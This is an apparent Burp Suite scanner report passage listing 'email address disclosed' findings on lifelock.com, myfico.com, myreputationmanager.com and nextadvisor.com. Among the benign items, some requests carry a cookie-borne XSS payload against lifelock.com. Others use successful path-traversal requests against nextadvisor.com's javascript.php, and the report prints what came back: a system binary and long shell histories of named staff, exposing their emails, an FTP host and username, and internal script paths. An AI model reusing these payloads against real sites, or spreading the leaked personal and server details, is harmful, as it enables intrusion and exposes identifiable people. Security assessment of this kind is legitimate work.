Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:45 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12670

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.79. http://www.lifelock.com/identity-theft/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The following email address was disclosed in the response:

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:46 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32685

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.80. http://www.lifelock.com/scripts/jquery.colorbox.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /scripts/jquery.colorbox.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery.colorbox.min.js HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
Cache-Control: max-age=0
If-Modified-Since: Wed, 05 Jan 2011 18:51:59 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "1a596-23e7-e13fd1c0"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d

Response

HTTP/1.1 200 OK
ETag: "1a596-23e7-e13fd1c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Age: 54317
Date: Sun, 24 Apr 2011 03:34:21 GMT
Last-Modified: Wed, 05 Jan 2011 18:51:59 GMT
Connection: keep-alive
Content-Length: 9191

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";func
...[SNIP]...

26.81. http://www.lifelock.com/scripts/lifelock.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /scripts/lifelock.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/lifelock.js HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
Cache-Control: max-age=0
If-Modified-Since: Wed, 09 Jun 2010 22:24:25 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "1a598-2f86-5e4b9840"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "74d18-2f86-5e4b9840"
Accept-Ranges: bytes
X-Cnection: close
Content-Type: application/x-javascript
Vary: Accept-Encoding
Age: 223567
Date: Sun, 24 Apr 2011 03:33:51 GMT
Last-Modified: Wed, 09 Jun 2010 22:24:25 GMT
Connection: keep-alive
Content-Length: 12166

//=============================================================================
//Program:            Lifelock Specific Javascript
//Version:            1.0
//Date:                12/20/2006
//Last Modified:    11/6/2007
//=====
...[SNIP]...
<BDORTCH@NETW.COM>
...[SNIP]...

26.82. http://www.lifelock.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/

Issue detail

The following email address was disclosed in the response:

Request

GET /services/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:42 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=d8c1f16f42bc8bee3379313534313201632367929eb271604db4542e; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13517

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.83. http://www.lifelock.com/services/command-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/command-center/

Issue detail

The following email address was disclosed in the response:

Request

GET /services/command-center/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=672a43aa9e4e9b5fe762c7f07c003e9cd78ab7a6ed034dd24db4542d; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:48:01 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=578734b64e67c084c0355516c462736c1debaef3a49de19f4db45441; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13351

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="mailto:member.services@lifelock.com">
...[SNIP]...

26.84. https://www.myfico.com/Include/Register.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Include/Register.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Include/Register.js HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; 90223518_clogin=l=1303691709&v=1&e=1303693593868; NewUser=4/24/2011 7:35:48 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; cmRS=&t1=1303691709454&t2=1303691711963&t3=1303691798835&lti=1303691793867&ln=&hr=http%3A//srv02.amadesa.com/Interaction2/counter%3Fpid%3D534%26uid%3Df39ebcfe7b8d92f801e54dcbf76037de.02%26vsid%3D1%26hc%3D1%26prid%3D2617%7C2186%7C2189%7C2183%7C2819%7C2216%7C2842%7C2375%7C2785%26egid%3D4923%26tid%3D4125%26ttype%3D4%26wid%3D39332%26evt%3D8%2Cw%2C39332%26red%3Dhttp%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10&fti=&fn=%3A0%3BaspnetForm%3A1%3Bemail_signup_module%3A2%3B&ac=&fd=&uer=&fu=&pi=Default.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&cjen=1; acopendivids=nada; acgroupswithpersist=nada

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Apr 2011 18:03:52 GMT
Accept-Ranges: bytes
ETag: "ca633e50cefacb1:10ddc"
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 00:36:28 GMT
Connection: keep-alive
Content-Length: 21907

...

function CheckFirstName(elem) {
var result = ValidateName(elem.value, 1);
SetStatusMessage('ctl00_cphMainContent_divFirstNameStatus', result);
}

function CheckLastName(elem) {

...[SNIP]...
ateTextNode("Patty Prorok");
var newtext2_1 = document.createTextNode("800-444-5850 ext. 26236");
var pLink = document.createElement("a");
pLink.setAttribute("href", "mailto:pprorok@fico.com");
var pLinktxt = document.createTextNode("pprorok@fico.com");
pLink.appendChild(pLinktxt);
p2.appendChild(newtext2);
p2.appendChild(br1);
p2.appendChild(newtext2_1);
p2.appendChild(document.createElement("br"));

...[SNIP]...
xtNode("George Sternecker");
var newtext4_1 = document.createTextNode("800-444-5850 ext. 26277");
var gLink = document.createElement("a");
gLink.setAttribute("href", "mailto:georgesternecker@fico.com");
var gLinktxt = document.createTextNode("georgesternecker@fico.com");
gLink.appendChild(gLinktxt);
p4.appendChild(newtext4);
p4.appendChild(document.createElement("br"));
p4.appendChild(newtext4_1);
p4.appendChild(document
...[SNIP]...

26.85. http://www.myreputationmanager.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CNrfy-W1tqgCFYje4AodAk7yCQ HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 46255
Content-Type: text/html
Content-Location: http://www.myreputationmanager.com/Index.html
Last-Modified: Wed, 23 Feb 2011 01:42:44 GMT
Accept-Ranges: bytes
ETag: "54c233f7fad2cb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:36:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
<a href="mailto:sales@myreputationmanager.com"><a href="mailto:sales@myreputationmanager.com">
...[SNIP]...

26.86. http://www.myreputationmanager.com/script/jsvalidations.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /script/jsvalidations.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/jsvalidations.js HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
Referer: http://www.myreputationmanager.com/?gclid=CNrfy-W1tqgCFYje4AodAk7yCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11301
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 11:16:44 GMT
Accept-Ranges: bytes
ETag: "aabfabde0accb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:33:58 GMT


//**************************************************************************
// To chk which explorer client has

var isNS4 = (navigator.appName=="Netscape")?1:0;

function chkKeypress(evt)    //c
...[SNIP]...
string represents an atom (basically a series of non-special characters.) */
       var atom=validChars + '+';

       /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
       var word="(" + atom + "|" + quotedUser + ")";

       // The following pattern describes the structure of the user
...[SNIP]...

26.87. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/javascript.php?script=../../../../../../../../../../../home/phil/.bash_history HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:08:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 35327

svn commit -m "copy tweaks" www/deal_discounter/privacy.php
cd www
cd deal_discounter/
ln -s /blog/wp-content/themes/twentyten ./2010
svn commit . -m "pricacy tweak"
svn commit . -m "pricacy tweak"
c
...[SNIP]...
omo/3_in_1
svn commit equifax-promo -m "3 in 1"
dir
cd www
dir
svn commit equifax-promo -m "putting the things in"
ftp ftp.veryserious.org
ftp jake:ftp.veryserious.org
ftp ftp.veryserious.org:jake
ftp jake@ftp.veryserious.org
exit
exit
cd www
cd deal_discounter/
cd ../
svn up deal_discounter/
svn commit www/admin/ -m "fixed finally"
svn commit www/admin/ -m "fixed finally"
svn commit www/admin/ -m "fixed finally"
svn commi
...[SNIP]...

26.88. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/javascript.php?script=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fbin%2fls HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:30:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 87608

ELF..............>......'@.....@.......xN..........@.8...@.............@.......@.@.....@.@...............................................@.......@...............................................@.....
...[SNIP]...
<%s>.
.bug-coreutils@gnu.org.?.%*lu .%-*s .User name too long.Group name too long.cannot read symbolic link %s.%s %*s .%-32s . ->
...[SNIP]...

26.89. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /includes/javascript.php?script=../../../../../../../../../../../home/roxane/.bash_history HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:09:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 15745

php index.php
crontab -e
ls
ls -la
ls -la
ls -la
ls -la
perl ~/www/reporting/idguard/csv.pl
ls -la
php ~/www/reporting/idguard/transform.php
ls -la
ls -la
php ~/www/reporting/idguard/transform.php
ls
...[SNIP]...
/reporting/idguard/transform.php
ls -la
php ~/www/reporting/idguard/transform.php
ls -la
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
ls
cat test.csv
php transform.php
cat test.csv
php transform.php
ls -al
ls -al
php transform.php
ls -al
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
cat test.csv
ls -al ../includes/
php transform.php
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
cd ../allreports/
ls
ls -al
cd ../idguard/
cat test.csv |more
php transform.php
php transform.php
php transform.php
clear
php transform.php
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
cat test.csv |more
cd ../allreports/
ls -la
php run_yesterday_report.php
chmod 777 allreports.csv
rm allreports.csv
php run_yesterday_report.php
ls -al
cat allreports.csv |more
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com"
cd ../idguard/
ls
ls -la
cd ../
ls
cd allreports/
ls
ls -al
rm allreports.csv
php run_yesterday_report.php
ls -al
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com"
ls -al
rm allreports.csv
cd ..
cd idguard/
ls
ls
php transform.php
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
ls
ls -al
perl csv.pl
ls -al
php transform.php
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
rm allreports.csv
cd ../allreports/
rm allreports.csv
vi run_yesterday_report_email_only_me.sh
php run_yesterday_report.php
ls
ls -al
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com"
vi run_yesterday_report.php
vi run_yesterday_report.php
vi run_yesterday_report_email_only_me.sh
ls -al
rm .run_yesterday_report_email_only_me.sh.swp
rm ._run_yesterday_report_email_only_me.sh
r
...[SNIP]...

php transform.php
ls -al
cd ..
cd allreports/
php run_yesterday_report.php
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com"
crontab -e
ls -al
rm .run_yesterday_report.sh.swp
ls -al ../idguard/
ls -al ../idguard/
ls -al ../idguard/
crontab -e
perl ~/www/reporting/idguard/csv.pl
ls -al
ls -al ../idguard/
rm ../idguard/test
...[SNIP]...
/reporting/idguard/transform.php
php ~/www/reporting/allreports/run_yesterday_report.php
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
crontab -e
crontab -e
ls
crontab -e
php ~/www/reporting/idguard/transform.php
ls
ls -al
crontab -e
php ~/www/reporting/allreports/run_yesterday_report.php
ls
crontab -e
ls
ls
uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com"
crontab -e
cd ../allreports/
ls
ls -al
crontab -e
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com"
crontab -e
cd ../idguard/
ls
crontab -e
perl ~/www/reporting/idguard/csv.pl
php ~/www/reporting/idguard/transform.php
